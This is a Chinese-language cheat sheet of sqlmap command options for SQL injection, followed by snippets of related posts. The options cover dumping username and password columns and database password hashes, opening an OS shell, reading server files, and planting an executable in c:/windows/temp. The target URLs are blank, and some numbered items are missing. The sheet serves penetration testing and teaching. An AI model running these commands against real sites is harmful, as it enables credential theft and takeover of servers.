sqlmap中常用的幾個命令

1. -u：表示需要探測的目標站點url，例如：

sqlmap.py -u

注：如果url後引數個數大於等於2個，則需要加上雙引號

sqlmap.py -u "&username=zhangsan"

2. -r：表示判斷乙個文字中的請求是否存在注入，一般在存在cookie注入時使用，路徑可以是相對路徑也可以是絕對路徑

sqlmap.py -r desktop/1.txt

3.--dbs：表示查詢當前使用者下的所有資料庫，縮寫成-d ***，表示查詢***資料中繼續查詢其他資料

sqlmap.py -u  --dbs

4.--tables：表示查詢資料庫中的表名，縮寫成-t ***，表示查詢***表中的其他資料

sqlmap.py -u "" -d sqli --tables

5.--column：表示獲取表中的欄位名，縮寫成-c ***，表示查詢***列的其它資料

sqlmap.py -u "" -d sqli -t user --column

6. --dump -d sqli -t user -c username ，password ，表示查詢sqli資料庫中的user表中的 username和password欄位的資料

sqlmap.py -u "" --dump -d sqli -t user -c username,password

7.--users：表示列出資料庫的所有使用者

sqlmap.py -u "" --users

8.--passwords：表示列出資料庫使用者的密碼

sqlmap.py -u "" --passwords

sqlmap.py -u "" --current-db

sqlmap.py -u "" --current-user

11.--level :表示探測等級，有1~5五個等級，5表示最高等級，payload最多，可自動破解cookie，xff注入等漏洞，執行速度較慢

12. --is-dba：表示當前使用者是否為管理許可權

sqlmap.py -u "" --is-dba

13.--roles：列出資料庫管理員角色（只適用於oracle資料庫）

15.--sql-shell：表示可以執行自定義sql語句

16.--os-cmd， --os-shell：表示可以執行windows和linux作業系統命令

17.--file-read：表示從資料庫伺服器中讀取檔案

sqlmap.py -u ""  \   --file-read "c:/example.exe" -v  1

18.--file-write 「***」 --file-dest "yyy" ：表示將***寫到伺服器yyy目錄下

slqmap.py -u "" --file-write  \  "/software/a.exe"   --file-dest "c:/windows/temp/a.exe" -v  1

開發中常用的幾個linux命令

檔案查詢 find name db2jcc.jar 網絡卡抓包 tcpdump i eth5 vv s 0 w sgm.cap tcpdump i any port 80 and host 128.20.8.190 s 0 w home test.cap vv tcpdump i any port ...

分享幾個在shell中常用的命令

比較檔案差異 root localhost mnt cat file112 345 root localhost mnt cat file212 3456 root localhost mnt diff file1 file2 5a6 6 root localhost mnt diff u file...

sqlmap常用操作命令

一 sqlmap常用基礎命令 sqlmap common operation command 以下命令順序即為sql注入常見步驟。sqlmap u url dbs 獲取資料庫 sqlmap u url current user 獲取當前使用者名稱 sqlmap u url current db 獲取...

sqlmap中常用的幾個命令

開發中常用的幾個linux命令

分享幾個在shell中常用的命令

sqlmap常用操作命令

相關推薦